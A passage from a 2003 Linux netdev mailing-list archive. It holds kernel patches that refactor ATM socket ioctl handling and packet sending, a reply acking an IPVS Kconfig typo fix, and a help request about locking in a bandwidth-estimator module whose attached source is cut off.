-ENOIOCTLCMD) + error = br2684_ioctl_hook(vcc, cmd, arg); + if (error != -ENOIOCTLCMD) goto done; } #endif - if (get_user(buf,&((struct atmif_sioc *) arg)->arg)) { - ret_val = -EFAULT; - goto done; - } - if (get_user(len,&((struct atmif_sioc *) arg)->length)) { - ret_val = -EFAULT; - goto done; - } - if (get_user(number,&((struct atmif_sioc *) arg)->number)) { - ret_val = -EFAULT; - goto done; - } - if (!(dev = atm_dev_lookup(number))) { - ret_val = -ENODEV; - goto done; - } - - size = 0; - switch (cmd) { - case ATM_GETTYPE: - size = strlen(dev->type)+1; - if (copy_to_user(buf,dev->type,size)) { - ret_val = -EFAULT; - goto done_release; - } - break; - case ATM_GETESI: - size = ESI_LEN; - if (copy_to_user(buf,dev->esi,size)) { - ret_val = -EFAULT; - goto done_release; - } - break; - case ATM_SETESI: - { - int i; - - for (i = 0; i < ESI_LEN; i++) - if (dev->esi[i]) { - ret_val = -EEXIST; - goto done_release; - } - } - /* fall through */ - case ATM_SETESIF: - { - unsigned char esi[ESI_LEN]; - - if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; - goto done_release; - } - if (copy_from_user(esi,buf,ESI_LEN)) { - ret_val = -EFAULT; - goto done_release; - } - memcpy(dev->esi,esi,ESI_LEN); - ret_val = ESI_LEN; - goto done_release; - } - case ATM_GETSTATZ: - if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; - goto done_release; - } - /* fall through */ - case ATM_GETSTAT: - size = sizeof(struct atm_dev_stats); - error = fetch_stats(dev,buf,cmd == ATM_GETSTATZ); - if (error) { - ret_val = error; - goto done_release; - } - break; - case ATM_GETCIRANGE: - size = sizeof(struct atm_cirange); - if (copy_to_user(buf,&dev->ci_range,size)) { - ret_val = -EFAULT; - goto done_release; - } - break; - case ATM_GETLINKRATE: - size = sizeof(int); - if (copy_to_user(buf,&dev->link_rate,size)) { - ret_val = -EFAULT; - goto done_release; - } - break; - case ATM_RSTADDR: - if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; - goto done_release; - } - atm_reset_addr(dev); - break; - case ATM_ADDADDR: - case ATM_DELADDR: - if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; - goto done_release; - } - { - struct sockaddr_atmsvc addr; - - if (copy_from_user(&addr,buf,sizeof(addr))) { - ret_val = -EFAULT; - goto done_release; - } - if (cmd == ATM_ADDADDR) - ret_val = atm_add_addr(dev,&addr); - else - ret_val = atm_del_addr(dev,&addr); - goto done_release; - } - case ATM_GETADDR: - size = atm_get_addr(dev,buf,len); - if (size < 0) - ret_val = size; - else - /* may return 0, but later on size == 0 means "don't - write the length" */ - ret_val = put_user(size, - &((struct atmif_sioc *) arg)->length) ? -EFAULT : 0; - goto done_release; - case ATM_SETLOOP: - if (__ATM_LM_XTRMT((int) (long) buf) && - __ATM_LM_XTLOC((int) (long) buf) > - __ATM_LM_XTRMT((int) (long) buf)) { - ret_val = -EINVAL; - goto done_release; - } - /* fall through */ - case ATM_SETCIRANGE: - case SONET_GETSTATZ: - case SONET_SETDIAG: - case SONET_CLRDIAG: - case SONET_SETFRAMING: - if (!capable(CAP_NET_ADMIN)) { - ret_val = -EPERM; - goto done_release; - } - /* fall through */ - default: - if (!dev->ops->ioctl) { - ret_val = -EINVAL; - goto done_release; - } - size = dev->ops->ioctl(dev,cmd,buf); - if (size < 0) { - ret_val = (size == -ENOIOCTLCMD ? -EINVAL : size); - goto done_release; - } - } - - if (size) - ret_val = put_user(size,&((struct atmif_sioc *) arg)->length) ? - -EFAULT : 0; - else - ret_val = 0; -done_release: - atm_dev_release(dev); + error = atm_dev_ioctl(cmd, arg); done: - return ret_val; + return error; } diff -Nru a/net/atm/common.h b/net/atm/common.h --- a/net/atm/common.h Mon Jun 30 13:21:27 2003 +++ b/net/atm/common.h Mon Jun 30 13:21:27 2003 @@ -18,7 +18,7 @@ int atm_sendmsg(struct socket *sock,struct msghdr *m,int total_len, struct scm_cookie *scm); unsigned int atm_poll(struct file *file,struct socket *sock,poll_table *wait); -int atm_ioctl(struct socket *sock,unsigned int cmd,unsigned long arg); +int vcc_ioctl(struct socket *sock, unsigned int cmd, unsigned long arg); int atm_setsockopt(struct socket *sock,int level,int optname,char *optval, int optlen); int atm_getsockopt(struct socket *sock,int level,int optname,char *optval, diff -Nru a/net/atm/pvc.c b/net/atm/pvc.c --- a/net/atm/pvc.c Mon Jun 30 13:21:27 2003 +++ b/net/atm/pvc.c Mon Jun 30 13:21:27 2003 @@ -74,24 +74,24 @@ static struct proto_ops SOCKOPS_WRAPPED(pvc_proto_ops) = { - family: PF_ATMPVC, + .family = PF_ATMPVC, - release: atm_release, - bind: pvc_bind, - connect: pvc_connect, - socketpair: sock_no_socketpair, - accept: sock_no_accept, - getname: pvc_getname, - poll: atm_poll, - ioctl: atm_ioctl, - listen: sock_no_listen, - shutdown: pvc_shutdown, - setsockopt: atm_setsockopt, - getsockopt: atm_getsockopt, - sendmsg: atm_sendmsg, - recvmsg: atm_recvmsg, - mmap: sock_no_mmap, - sendpage: sock_no_sendpage, + .release = atm_release, + .bind = pvc_bind, + .connect = pvc_connect, + .socketpair = sock_no_socketpair, + .accept = sock_no_accept, + .getname = pvc_getname, + .poll = atm_poll, + .ioctl = vcc_ioctl, + .listen = sock_no_listen, + .shutdown = pvc_shutdown, + .setsockopt = atm_setsockopt, + .getsockopt = atm_getsockopt, + .sendmsg = atm_sendmsg, + .recvmsg = atm_recvmsg, + .mmap = sock_no_mmap, + .sendpage = sock_no_sendpage, }; diff -Nru a/net/atm/resources.c b/net/atm/resources.c --- a/net/atm/resources.c Mon Jun 30 13:21:27 2003 +++ b/net/atm/resources.c Mon Jun 30 13:21:27 2003 @@ -7,6 +7,7 @@ #include #include #include +#include #include /* for barrier */ #include #include @@ -15,6 +16,7 @@ #include "common.h" #include "resources.h" +#include "addr.h" #ifndef NULL @@ -170,6 +172,240 @@ dev->ops->dev_close(dev); atm_dev_deregister(dev); } + + +static void copy_aal_stats(struct k_atm_aal_stats *from, + struct atm_aal_stats *to) +{ +#define __HANDLE_ITEM(i) to->i = atomic_read(&from->i) + __AAL_STAT_ITEMS +#undef __HANDLE_ITEM +} + + +static void subtract_aal_stats(struct k_atm_aal_stats *from, + struct atm_aal_stats *to) +{ +#define __HANDLE_ITEM(i) atomic_sub(to->i, &from->i) + __AAL_STAT_ITEMS +#undef __HANDLE_ITEM +} + + +static int fetch_stats(struct atm_dev *dev, struct atm_dev_stats *arg, int zero) +{ + struct atm_dev_stats tmp; + int error = 0; + + copy_aal_stats(&dev->stats.aal0, &tmp.aal0); + copy_aal_stats(&dev->stats.aal34, &tmp.aal34); + copy_aal_stats(&dev->stats.aal5, &tmp.aal5); + if (arg) + error = copy_to_user(arg, &tmp, sizeof(tmp)); + if (zero && !error) { + subtract_aal_stats(&dev->stats.aal0, &tmp.aal0); + subtract_aal_stats(&dev->stats.aal34, &tmp.aal34); + subtract_aal_stats(&dev->stats.aal5, &tmp.aal5); + } + return error ? -EFAULT : 0; +} + + +int atm_dev_ioctl(unsigned int cmd, unsigned long arg) +{ + void *buf; + int error, len, number, size = 0; + struct atm_dev *dev; + struct list_head *p; + int *tmp_buf, *tmp_p; + + switch (cmd) { + case ATM_GETNAMES: + if (get_user(buf, &((struct atm_iobuf *) arg)->buffer)) + return -EFAULT; + if (get_user(len, &((struct atm_iobuf *) arg)->length)) + return -EFAULT; + spin_lock(&atm_dev_lock); + list_for_each(p, &atm_devs) + size += sizeof(int); + if (size > len) { + spin_unlock(&atm_dev_lock); + return -E2BIG; + } + tmp_buf = kmalloc(size, GFP_ATOMIC); + if (!tmp_buf) { + spin_unlock(&atm_dev_lock); + return -ENOMEM; + } + tmp_p = tmp_buf; + list_for_each(p, &atm_devs) { + dev = list_entry(p, struct atm_dev, dev_list); + *tmp_p++ = dev->number; + } + spin_unlock(&atm_dev_lock); + error = ((copy_to_user(buf, tmp_buf, size)) || + put_user(size, &((struct atm_iobuf *) arg)->length)) + ? -EFAULT : 0; + kfree(tmp_buf); + return error; + default: + break; + } + + if (get_user(buf, &((struct atmif_sioc *) arg)->arg)) + return -EFAULT; + if (get_user(len, &((struct atmif_sioc *) arg)->length)) + return -EFAULT; + if (get_user(number, &((struct atmif_sioc *) arg)->number)) + return -EFAULT; + + if (!(dev = atm_dev_lookup(number))) + return -ENODEV; + + switch (cmd) { + case ATM_GETTYPE: + size = strlen(dev->type) + 1; + if (copy_to_user(buf, dev->type, size)) { + error = -EFAULT; + goto done; + } + break; + case ATM_GETESI: + size = ESI_LEN; + if (copy_to_user(buf, dev->esi, size)) { + error = -EFAULT; + goto done; + } + break; + case ATM_SETESI: + { + int i; + + for (i = 0; i < ESI_LEN; i++) + if (dev->esi[i]) { + error = -EEXIST; + goto done; + } + } + /* fall through */ + case ATM_SETESIF: + { + unsigned char esi[ESI_LEN]; + + if (!capable(CAP_NET_ADMIN)) { + error = -EPERM; + goto done; + } + if (copy_from_user(esi, buf, ESI_LEN)) { + error = -EFAULT; + goto done; + } + memcpy(dev->esi, esi, ESI_LEN); + error = ESI_LEN; + goto done; + } + case ATM_GETSTATZ: + if (!capable(CAP_NET_ADMIN)) { + error = -EPERM; + goto done; + } + /* fall through */ + case ATM_GETSTAT: + size = sizeof(struct atm_dev_stats); + error = fetch_stats(dev, buf, cmd == ATM_GETSTATZ); + if (error) + goto done; + break; + case ATM_GETCIRANGE: + size = sizeof(struct atm_cirange); + if (copy_to_user(buf, &dev->ci_range, size)) { + error = -EFAULT; + goto done; + } + break; + case ATM_GETLINKRATE: + size = sizeof(int); + if (copy_to_user(buf, &dev->link_rate, size)) { + error = -EFAULT; + goto done; + } + break; + case ATM_RSTADDR: + if (!capable(CAP_NET_ADMIN)) { + error = -EPERM; + goto done; + } + atm_reset_addr(dev); + break; + case ATM_ADDADDR: + case ATM_DELADDR: + if (!capable(CAP_NET_ADMIN)) { + error = -EPERM; + goto done; + } + { + struct sockaddr_atmsvc addr; + + if (copy_from_user(&addr, buf, sizeof(addr))) { + error = -EFAULT; + goto done; + } + if (cmd == ATM_ADDADDR) + error = atm_add_addr(dev, &addr); + else + error = atm_del_addr(dev, &addr); + goto done; + } + case ATM_GETADDR: + error = atm_get_addr(dev, buf, len); + if (error < 0) + goto done; + size = error; + /* may return 0, but later on size == 0 means "don't + write the length" */ + error = put_user(size, &((struct atmif_sioc *) arg)->length) + ? -EFAULT : 0; + goto done; + case ATM_SETLOOP: + if (__ATM_LM_XTRMT((int) (long) buf) && + __ATM_LM_XTLOC((int) (long) buf) > + __ATM_LM_XTRMT((int) (long) buf)) { + error = -EINVAL; + goto done; + } + /* fall through */ + case ATM_SETCIRANGE: + case SONET_GETSTATZ: + case SONET_SETDIAG: + case SONET_CLRDIAG: + case SONET_SETFRAMING: + if (!capable(CAP_NET_ADMIN)) { + error = -EPERM; + goto done; + } + /* fall through */ + default: + if (!dev->ops->ioctl) { + error = -EINVAL; + goto done; + } + size = dev->ops->ioctl(dev, cmd, buf); + if (size < 0) { + error = (size == -ENOIOCTLCMD ? -EINVAL : size); + goto done; + } + } + + if (size) + error = put_user(size, &((struct atmif_sioc *) arg)->length) + ? -EFAULT : 0; + else + error = 0; +done: + atm_dev_release(dev); + return error; +} + /* Handler for sk->destruct, invoked by sk_free() */ diff -Nru a/net/atm/resources.h b/net/atm/resources.h --- a/net/atm/resources.h Mon Jun 30 13:21:27 2003 +++ b/net/atm/resources.h Mon Jun 30 13:21:27 2003 @@ -16,6 +16,7 @@ struct sock *alloc_atm_vcc_sk(int family); void free_atm_vcc_sk(struct sock *sk); +int atm_dev_ioctl(unsigned int cmd, unsigned long arg); #ifdef CONFIG_PROC_FS diff -Nru a/net/atm/svc.c b/net/atm/svc.c --- a/net/atm/svc.c Mon Jun 30 13:21:27 2003 +++ b/net/atm/svc.c Mon Jun 30 13:21:27 2003 @@ -392,24 +392,24 @@ static struct proto_ops SOCKOPS_WRAPPED(svc_proto_ops) = { - family: PF_ATMSVC, + .family = PF_ATMSVC, - release: svc_release, - bind: svc_bind, - connect: svc_connect, - socketpair: sock_no_socketpair, - accept: svc_accept, - getname: svc_getname, - poll: atm_poll, - ioctl: atm_ioctl, - listen: svc_listen, - shutdown: svc_shutdown, - setsockopt: svc_setsockopt, - getsockopt: svc_getsockopt, - sendmsg: atm_sendmsg, - recvmsg: atm_recvmsg, - mmap: sock_no_mmap, - sendpage: sock_no_sendpage, + .release = svc_release, + .bind = svc_bind, + .connect = svc_connect, + .socketpair = sock_no_socketpair, + .accept = svc_accept, + .getname = svc_getname, + .poll = atm_poll, + .ioctl = vcc_ioctl, + .listen = svc_listen, + .shutdown = svc_shutdown, + .setsockopt = svc_setsockopt, + .getsockopt = svc_getsockopt, + .sendmsg = atm_sendmsg, + .recvmsg = atm_recvmsg, + .mmap = sock_no_mmap, + .sendpage = sock_no_sendpage, }; [atm]: cleanup warnings during compiles # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1017 -> 1.1018 # net/atm/lec.c 1.17 -> 1.18 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/28 chas@relax.cmf.nrl.navy.mil 1.1018 # lec.c: # cleanup warnings during compiles # -------------------------------------------- # diff -Nru a/net/atm/lec.c b/net/atm/lec.c --- a/net/atm/lec.c Mon Jun 30 13:21:08 2003 +++ b/net/atm/lec.c Mon Jun 30 13:21:08 2003 @@ -37,6 +37,10 @@ #include #include "../bridge/br_private.h" static unsigned char bridge_ula_lec[] = {0x01, 0x80, 0xc2, 0x00, 0x00}; + +extern struct net_bridge_fdb_entry *(*br_fdb_get_hook)(struct net_bridge *br, + unsigned char *addr); +extern void (*br_fdb_put_hook)(struct net_bridge_fdb_entry *ent); #endif /* Modular too */ @@ -52,10 +56,6 @@ #else #define DPRINTK(format,args...) #endif - -extern struct net_bridge_fdb_entry *(*br_fdb_get_hook)(struct net_bridge *br, - unsigned char *addr); -extern void (*br_fdb_put_hook)(struct net_bridge_fdb_entry *ent); #define DUMP_PACKETS 0 /* 0 = None, * 1 = 30 first bytes [atm]: send queued packets right after path switch completes # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1018 -> 1.1019 # net/atm/lec.c 1.18 -> 1.19 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/28 chas@relax.cmf.nrl.navy.mil 1.1019 # lec.c: # send queued packets right after path switch completes # -------------------------------------------- # diff -Nru a/net/atm/lec.c b/net/atm/lec.c --- a/net/atm/lec.c Mon Jun 30 13:20:52 2003 +++ b/net/atm/lec.c Mon Jun 30 13:20:52 2003 @@ -207,6 +207,22 @@ return 0; } +static __inline__ void +lec_send(struct atm_vcc *vcc, struct sk_buff *skb, struct lec_priv *priv) +{ + if (atm_may_send(vcc, skb->len)) { + atomic_add(skb->truesize, &vcc->sk->wmem_alloc); + ATM_SKB(skb)->vcc = vcc; + ATM_SKB(skb)->atm_options = vcc->atm_options; + priv->stats.tx_packets++; + priv->stats.tx_bytes += skb->len; + vcc->send(vcc, skb); + } else { + priv->stats.tx_dropped++; + dev_kfree_skb(skb); + } +} + static int lec_send_packet(struct sk_buff *skb, struct net_device *dev) { @@ -351,33 +367,10 @@ DPRINTK("MAC address 0x%02x:%02x:%02x:%02x:%02x:%02x\n", lec_h->h_dest[0], lec_h->h_dest[1], lec_h->h_dest[2], lec_h->h_dest[3], lec_h->h_dest[4], lec_h->h_dest[5]); - ATM_SKB(skb2)->vcc = send_vcc; - ATM_SKB(skb2)->atm_options = send_vcc->atm_options; - DPRINTK("%s:sending to vpi:%d vci:%d\n", dev->name, - send_vcc->vpi, send_vcc->vci); - if (atm_may_send(send_vcc, skb2->len)) { - atomic_add(skb2->truesize, &send_vcc->sk->wmem_alloc); - priv->stats.tx_packets++; - priv->stats.tx_bytes += skb2->len; - send_vcc->send(send_vcc, skb2); - } else { - priv->stats.tx_dropped++; - dev_kfree_skb(skb2); - } + lec_send(send_vcc, skb2, priv); } - ATM_SKB(skb)->vcc = send_vcc; - ATM_SKB(skb)->atm_options = send_vcc->atm_options; - if (atm_may_send(send_vcc, skb->len)) { - atomic_add(skb->truesize, &send_vcc->sk->wmem_alloc); - priv->stats.tx_packets++; - priv->stats.tx_bytes += skb->len; - send_vcc->send(send_vcc, skb); - } else { - priv->stats.tx_dropped++; - dev_kfree_skb(skb); - } - + lec_send(send_vcc, skb, priv); #if 0 /* Should we wait for card's device driver to notify us? */ dev->tbusy=0; @@ -1617,6 +1610,10 @@ && time_after_eq(now, entry->timestamp+ priv->path_switching_delay)) { + struct sk_buff *skb; + + while ((skb = skb_dequeue(&entry->tx_wait))) + lec_send(entry->vcc, skb, entry->priv); entry->last_used = jiffies; entry->status = ESI_FORWARD_DIRECT; @@ -2010,6 +2007,10 @@ for (entry=priv->lec_arp_tables[i];entry;entry=entry->next) { if (entry->flush_tran_id == tran_id && entry->status == ESI_FLUSH_PENDING) { + struct sk_buff *skb; + + while ((skb = skb_dequeue(&entry->tx_wait))) + lec_send(entry->vcc, skb, entry->priv); entry->status = ESI_FORWARD_DIRECT; DPRINTK("LEC_ARP: Flushed\n"); } [atm]: cleanup pppoatm_ioctl_hook # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1019 -> 1.1020 # net/atm/pppoatm.c 1.5 -> 1.6 # net/atm/common.h 1.3 -> 1.4 # net/atm/common.c 1.19 -> 1.20 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/28 chas@relax.cmf.nrl.navy.mil 1.1020 # pppoatm.c, common.h, common.c: # cleanup pppoatm_ioctl_hook # -------------------------------------------- # diff -Nru a/net/atm/common.c b/net/atm/common.c --- a/net/atm/common.c Mon Jun 30 13:20:21 2003 +++ b/net/atm/common.c Mon Jun 30 13:20:21 2003 @@ -130,8 +130,19 @@ #endif #if defined(CONFIG_PPPOATM) || defined(CONFIG_PPPOATM_MODULE) -int (*pppoatm_ioctl_hook)(struct atm_vcc *, unsigned int, unsigned long); -EXPORT_SYMBOL(pppoatm_ioctl_hook); +static DECLARE_MUTEX(pppoatm_ioctl_mutex); + +static int (*pppoatm_ioctl_hook)(struct atm_vcc *, unsigned int, unsigned long); + +void pppoatm_ioctl_set(int (*hook)(struct atm_vcc *, unsigned int, unsigned long)) +{ + down(&pppoatm_ioctl_mutex); + pppoatm_ioctl_hook = hook; + up(&pppoatm_ioctl_mutex); +} +#ifdef CONFIG_PPPOATM_MODULE +EXPORT_SYMBOL(pppoatm_ioctl_set); +#endif #endif #if defined(CONFIG_ATM_BR2684) || defined(CONFIG_ATM_BR2684_MODULE) @@ -806,12 +817,14 @@ default: break; } + error = -ENOIOCTLCMD; #if defined(CONFIG_PPPOATM) || defined(CONFIG_PPPOATM_MODULE) - if (pppoatm_ioctl_hook) { + down(&pppoatm_ioctl_mutex); + if (pppoatm_ioctl_hook) error = pppoatm_ioctl_hook(vcc, cmd, arg); - if (error != -ENOIOCTLCMD) - goto done; - } + up(&pppoatm_ioctl_mutex); + if (error != -ENOIOCTLCMD) + goto done; #endif #if defined(CONFIG_ATM_BR2684) || defined(CONFIG_ATM_BR2684_MODULE) if (br2684_ioctl_hook) { diff -Nru a/net/atm/common.h b/net/atm/common.h --- a/net/atm/common.h Mon Jun 30 13:20:21 2003 +++ b/net/atm/common.h Mon Jun 30 13:20:21 2003 @@ -28,6 +28,8 @@ void atm_release_vcc_sk(struct sock *sk,int free_sk); void atm_shutdown_dev(struct atm_dev *dev); +void pppoatm_ioctl_set(int (*hook)(struct atm_vcc *, unsigned int, unsigned long)); + int atmpvc_init(void); void atmpvc_exit(void); int atmsvc_init(void); diff -Nru a/net/atm/pppoatm.c b/net/atm/pppoatm.c --- a/net/atm/pppoatm.c Mon Jun 30 13:20:21 2003 +++ b/net/atm/pppoatm.c Mon Jun 30 13:20:21 2003 @@ -44,6 +44,8 @@ #include #include +#include "common.h" + #if 0 #define DPRINTK(format, args...) \ printk(KERN_DEBUG "pppoatm: " format, ##args) @@ -344,17 +346,15 @@ /* the following avoids some spurious warnings from the compiler */ #define UNUSED __attribute__((unused)) -extern int (*pppoatm_ioctl_hook)(struct atm_vcc *, unsigned int, unsigned long); - static int __init UNUSED pppoatm_init(void) { - pppoatm_ioctl_hook = pppoatm_ioctl; + pppoatm_ioctl_set(pppoatm_ioctl); return 0; } static void __exit UNUSED pppoatm_exit(void) { - pppoatm_ioctl_hook = NULL; + pppoatm_ioctl_set(NULL); } module_init(pppoatm_init); [atm]: cleanup br2684_ioctl_hook # This is a BitKeeper generated patch for the following project: # Project Name: Linux kernel tree # This patch format is intended for GNU patch command version 2.5 or higher. # This patch includes the following deltas: # ChangeSet 1.1020 -> 1.1021 # net/atm/common.h 1.4 -> 1.5 # net/atm/common.c 1.20 -> 1.21 # net/atm/br2684.c 1.4 -> 1.5 # # The following is the BitKeeper ChangeSet Log # -------------------------------------------- # 03/06/28 chas@relax.cmf.nrl.navy.mil 1.1021 # common.h, common.c, br2684.c: # cleanup br2684_ioctl_hook # -------------------------------------------- # diff -Nru a/net/atm/br2684.c b/net/atm/br2684.c --- a/net/atm/br2684.c Mon Jun 30 13:20:06 2003 +++ b/net/atm/br2684.c Mon Jun 30 13:20:06 2003 @@ -16,9 +16,12 @@ #include #include #include +#include +#include #include +#include "common.h" #include "ipcommon.h" /* @@ -768,8 +771,6 @@ extern struct proc_dir_entry *atm_proc_root; /* from proc.c */ -extern int (*br2684_ioctl_hook)(struct atm_vcc *, unsigned int, unsigned long); - /* the following avoids some spurious warnings from the compiler */ #define UNUSED __attribute__((unused)) @@ -779,14 +780,14 @@ if ((p = create_proc_entry("br2684", 0, atm_proc_root)) == NULL) return -ENOMEM; p->proc_fops = &br2684_proc_operations; - br2684_ioctl_hook = br2684_ioctl; + br2684_ioctl_set(br2684_ioctl); return 0; } static void __exit UNUSED br2684_exit(void) { struct br2684_dev *brdev; - br2684_ioctl_hook = NULL; + br2684_ioctl_set(NULL); remove_proc_entry("br2684", atm_proc_root); while (!list_empty(&br2684_devs)) { brdev = list_entry_brdev(br2684_devs.next); diff -Nru a/net/atm/common.c b/net/atm/common.c --- a/net/atm/common.c Mon Jun 30 13:20:06 2003 +++ b/net/atm/common.c Mon Jun 30 13:20:06 2003 @@ -146,10 +146,19 @@ #endif #if defined(CONFIG_ATM_BR2684) || defined(CONFIG_ATM_BR2684_MODULE) -int (*br2684_ioctl_hook)(struct atm_vcc *, unsigned int, unsigned long); -#endif +static DECLARE_MUTEX(br2684_ioctl_mutex); + +static int (*br2684_ioctl_hook)(struct atm_vcc *, unsigned int, unsigned long); + +void br2684_ioctl_set(int (*hook)(struct atm_vcc *, unsigned int, unsigned long)) +{ + down(&br2684_ioctl_mutex); + br2684_ioctl_hook = hook; + up(&br2684_ioctl_mutex); +} #ifdef CONFIG_ATM_BR2684_MODULE -EXPORT_SYMBOL(br2684_ioctl_hook); +EXPORT_SYMBOL(br2684_ioctl_set); +#endif #endif #include "resources.h" /* atm_find_dev */ @@ -827,11 +836,12 @@ goto done; #endif #if defined(CONFIG_ATM_BR2684) || defined(CONFIG_ATM_BR2684_MODULE) - if (br2684_ioctl_hook) { + down(&br2684_ioctl_mutex); + if (br2684_ioctl_hook) error = br2684_ioctl_hook(vcc, cmd, arg); - if (error != -ENOIOCTLCMD) - goto done; - } + up(&br2684_ioctl_mutex); + if (error != -ENOIOCTLCMD) + goto done; #endif error = atm_dev_ioctl(cmd, arg); diff -Nru a/net/atm/common.h b/net/atm/common.h --- a/net/atm/common.h Mon Jun 30 13:20:06 2003 +++ b/net/atm/common.h Mon Jun 30 13:20:06 2003 @@ -29,6 +29,7 @@ void atm_shutdown_dev(struct atm_dev *dev); void pppoatm_ioctl_set(int (*hook)(struct atm_vcc *, unsigned int, unsigned long)); +void br2684_ioctl_set(int (*hook)(struct atm_vcc *, unsigned int, unsigned long)); int atmpvc_init(void); void atmpvc_exit(void); From ratz@drugphish.ch Mon Jul 14 13:16:29 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 13:16:45 -0700 (PDT) Received: from mailphish.drugphish.ch (adsl-196-233.cybernet.ch [212.90.196.233]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6EKGOFl032474 for ; Mon, 14 Jul 2003 13:16:27 -0700 Received: from drugphish.ch (unknown [172.23.2.31]) by mailphish.drugphish.ch (drugphish mail transportation agency) with ESMTP id 81109315A; Mon, 14 Jul 2003 19:56:45 +0000 (/etc/localtime) Message-ID: <3F130F84.8010104@drugphish.ch> Date: Mon, 14 Jul 2003 22:16:04 +0200 From: Roberto Nibali User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.3) Gecko/20030611 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Alberto Bertogli Cc: netdev@oss.sgi.com, linux-net@vger.kernel.org, linux-kernel@vger.kernel.org Subject: Re: [PATCH] IPVS' Kconfig LBLC and LBLCR configuration typo References: <20030714140350.GB1389@telpin.com.ar> In-Reply-To: <20030714140350.GB1389@telpin.com.ar> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4020 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ratz@drugphish.ch Precedence: bulk X-list: netdev Hello, > --- Kconfig.orig 2003-07-14 10:32:06.000000000 -0300 > +++ Kconfig 2003-07-14 10:32:57.000000000 -0300 > @@ -147,7 +147,7 @@ > unsure, say N. > > config IP_VS_LBLC > - tristate "locality-based least-connection with replication scheduling" > + tristate "locality-based least-connection scheduling" > depends on IP_VS > ---help--- > The locality-based least-connection scheduling algorithm is for > @@ -163,7 +163,7 @@ > unsure, say N. > > config IP_VS_LBLCR > - tristate "locality-based least-connection with replication schedulin" > + tristate "locality-based least-connection with replication scheduling" > depends on IP_VS > ---help--- > The locality-based least-connection with replication scheduling Obviously correct. Dave, if you haven't already, please apply to your tree, thanks. We're working on the 2.4.x patch ;). Best regards, Roberto Nibali, ratz -- echo '[q]sa[ln0=aln256%Pln256/snlbx]sb3135071790101768542287578439snlbxq'|dc From nalkunda@egr.msu.edu Mon Jul 14 14:53:52 2003 Received: with ECARTIS (v1.0.0; list netdev); Mon, 14 Jul 2003 14:54:05 -0700 (PDT) Received: from sys09.mail.msu.edu (sys09.mail.msu.edu [35.9.75.109]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6ELrpFl012923 for ; Mon, 14 Jul 2003 14:53:52 -0700 Received: from elans.cse.msu.edu ([35.9.43.164] helo=elans-pc.elans.cse.msu.edu) by sys09.mail.msu.edu with asmtp (Exim 4.10 #3) (TLSv1:RC4-MD5:128) (authenticated as nalkunda) id 19cBGT-000IoI-00; Mon, 14 Jul 2003 17:53:45 -0400 From: N N Ashok Organization: CSE, Michigan State University To: netdev@oss.sgi.com Subject: Kernel locking up in module Date: Mon, 14 Jul 2003 17:46:30 -0400 User-Agent: KMail/1.4.3 MIME-Version: 1.0 Content-Type: Multipart/Mixed; boundary="------------Boundary-00=_I5B1Z16K2MEMVO8EMDU8" Message-Id: <200307141746.30761.nalkunda@egr.msu.edu> X-archive-position: 4021 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: nalkunda@egr.msu.edu Precedence: bulk X-list: netdev --------------Boundary-00=_I5B1Z16K2MEMVO8EMDU8 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Hi All, I am creating a module to measure the outgoing bandwidth usage on the= =20 interfaces. It uses the get_stats() of the device to get the current stat= s=20 and then computes the bandwidth usage. The algorithm for the usage=20 calculation are borrowed from iproute2 package (tc/tc_estimator.c). The problem is that the kernel keeps locking up. I am using rwlock_t lo= cks=20 to lock the data. In the code, I traverse the list of bwuage structures a= nd=20 as a debug message am printing whether the traversal ended in the variabl= e=20 becoming null (which it should if everything went right), but the variabl= e is=20 non-null every other time I insert the module.=20 =09printk(KERN_INFO "bwestimator: dev: %s. bwusage: %s.\n", dev ? "non-nu= ll" :=20 "null", bwusage ? "non-null" : "null"); I think this has got to do with some locking issues. As this is my firs= t go=20 at the kernel locking, I might have used the wrong kind of locks. I have=20 attached the module source, header and the log messages as I inserted the= =20 module a couple of times. I request you all to please help me as I am tot= ally=20 lost here. Thanks, Ashok --------------Boundary-00=_I5B1Z16K2MEMVO8EMDU8 Content-Type: text/x-csrc; charset="us-ascii"; name="bwestimator.c" Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename="bwestimator.c" #include #include #include #include #include #include #include #if CONFIG_MODVERSIONS==1 #define MODVERSIONS #include #endif /** Timer */ struct timer_list estimator_timer; /** Moving average weight */ unsigned interval, time_const; int ewma_log; int idx; /** Function to check bandwidth usage */ void check_bandwidth(unsigned long ptr); /** * init_module: Module init function */ int init_module() { struct net_device *dev; struct bwusage *current_bwusage; /** * Temporarily used to stop the timer after a specific number of times */ unsigned long value; EXPORT_NO_SYMBOLS; /** * Borrowed from iproute2 package (tc/tc_estimator.c) * Following values were obtained by running the estimator for 1 sec * interval and 8 sec time constant of iproute2 package. */ interval = 1000000; /* 1 sec */ time_const = 8000000; /* 8 sec */ idx = 2; ewma_log = 3; /** Could this be true due to previous errors */ if(bwusage_head != NULL) { printk(KERN_INFO "bwestimator: bwusage_head is not NULL\n"); return -1; } bwusage_head = NULL; current_bwusage = NULL; /** 